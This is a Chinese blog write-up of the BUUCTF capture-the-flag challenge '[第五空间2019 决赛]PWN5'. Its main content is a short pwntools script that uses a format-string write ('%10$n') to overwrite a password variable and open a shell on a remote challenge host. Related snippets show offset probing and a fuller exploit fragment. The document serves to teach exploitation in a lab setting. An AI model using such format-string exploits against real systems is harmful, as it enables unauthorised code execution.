buu [第五空间2019 决赛]PWN5 wp

最新推荐文章于 2024-11-28 20:16:44 发布
原创 最新推荐文章于 2024-11-28 20:16:44 发布 · 290 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种利用格式化字符串漏洞的方法,通过向指定偏移地址写入特定数值来实现远程代码执行。示例中使用Python的pwntools库连接到远程服务器并发送构造好的payload。

存在格式化字符串漏洞
在这里插入图片描述

经过尝试发现偏移为10
在这里插入图片描述

from pwn import *

addr=0x804c044

p=remote("node3.buuoj.cn",29172)

#%10$n的意思是向偏移为10处所指向的地址处写入已经写的字符数
#即 mov [%10$n] , 字符数 
payload=p32(addr)+"%10$n"

p.sendline(payload)
#p32写入的字符数是4
p.sendline("4")
p.interactive()
[第五空间2019 决赛]PWN5
qq_45913417的博客
11-18 1912
判断附件相关信息: Arch:i386-32-little:32位小端序(数值低位放在内存低地址) 保护机制: 咲夜南梦师傅: Linux-编译保护 | 咲夜南梦’s 博客 (196011564.github.io) 利用格式化字符串漏洞覆盖dword_804C044处内存,输入passwd时使if判断句成立即可调用后门函数获取系统权限。 格式化字符串漏洞: 原理介绍 - CTF Wiki (ctf-wiki.org) 栈:第一个变量为返回地址,第二个变量为格式化字符串,第三个变量开始为参数,相
BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 634
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
buuctf之[第五空间2019 决赛]PWN5
weixin_54452942的博客
04-01 961
简单易懂~
BUUCTF PWN wp--[第五空间2019 决赛]PWN5
2302_81740139的博客
09-01 1139
在这个上下文中,%10$n表示写入的值将是printf的第10个参数,但由于p32(0x804C044)没有在printf调用中作为参数,它实际上利用了格式化字符串漏洞,将栈上的某个值写入到地址0x804C044。p32函数将32位整数转换为其小端序的字符串表示,这里转换的是地址0x804C044,这个地址应该是之前提到的全局变量dword_804C044的地址。这个变量似乎是一个全局变量,其地址是硬编码的(例如,在ELF文件中,地址可能是一个固定的地址)。如果之前的利用成功,这将提供一个shell。
BUUCTF-PWN题详解([第五空间2019 决赛]PWN5
最新发布
2302_80325559的博客
11-28 1833
今天给大家带来的题用到了和之前不相同的方法,用到了格式化字符串。
BUUCTF-PWN-[第五空间2019 决赛]PWN5
m0_64180167的博客
04-17 554
这题考到 格式化字符串的方法 我之前没有学过 根据wp写完这题去看看原理下载打开环境checksec看看发现有三个保护 nx打开 所以无法写入shellcode现在看看ida32发现/bin/sh进去看发现就在主函数里面我们进行代码审计 发现输入名字 他会返回名字 然后再输入密码 如果密码和unk_804c044一样 输出shellcode我们看看这个函数是什么搜索一下发现是随机数 这样我们就无法通过判断得到shellcode我们现在又两个方法。
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 547
Buu CTF PWN第五空间2019 决赛]PWN5的WriteUp
BUU刷题-Pwn-_第五空间2019 决赛_PWN5
一个啥也不会的小菜鸡!
07-13 162
利用0x804C044,0x804C045,0x804C046,0x804C047。必须使用格式化字符串将dword_804C04所有字符初始化,即可攻破该程序。的值位于bss段且占4个字节(都会生成随机数),要使。计算出输入入口的参数位置:是第10个参数。该试题有格式化字符串漏洞,需要满足。
BUUCTF - [第五空间2019 决赛]PWN5
Sakura给爷pwn全场
02-03 349
from pwn import * context(arch='i386',os='linux',log_level='debug',binary='pwn5') io=remote('node3.buuoj.cn',28518) elf=ELF('./pwn5') io.recvuntil('your name:') unk_addr=0x0804C044 payload=p32(unk_addr)+'%10$n' io.sendline(payload) io.recvuntil('your passw
[buuctf][第五空间2019 决赛]PWN5
逆向萌新的博客
06-19 628
[buuctf][第五空间2019 决赛]PWN5
BUUCTF [第五空间2019 决赛]PWN5
红叶的博客
10-31 2112
输入探测格式化字符串的payload,AAAA-%x-%x-%x-%x-%x,A的ASCII码值为65(0x41),因此是图中选中的段。通过 fmtstr_payload 将 dword_804C044 的内容替换为0x1,而非随机数。因为我们已经知道偏移量了,可以使用pwntools的 fmtstr_payload 函数。但是这次是将 dword_804C044 修改为任意值,然后再次输入此值即可获取shell。或者还有一个,AAAA-%p-%p-%p-%p-%p-%p,32位64位通用。
PWN——[第五空间2019 决赛]PWN5
有头发的埼玉
11-14 577
完全通过静态分析得到题解,与网传算法不同
BUU论坛自定义编辑器DianUbb功能介绍
5. **编辑器说明.txt**:这是一个纯文本文件,提供了关于163Editor编辑器的使用说明、配置方法、功能描述等文档信息。用户可以查看此文件以了解如何在BUU论坛使用编辑器,了解各种按钮、工具和扩展功能的作用。 6. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值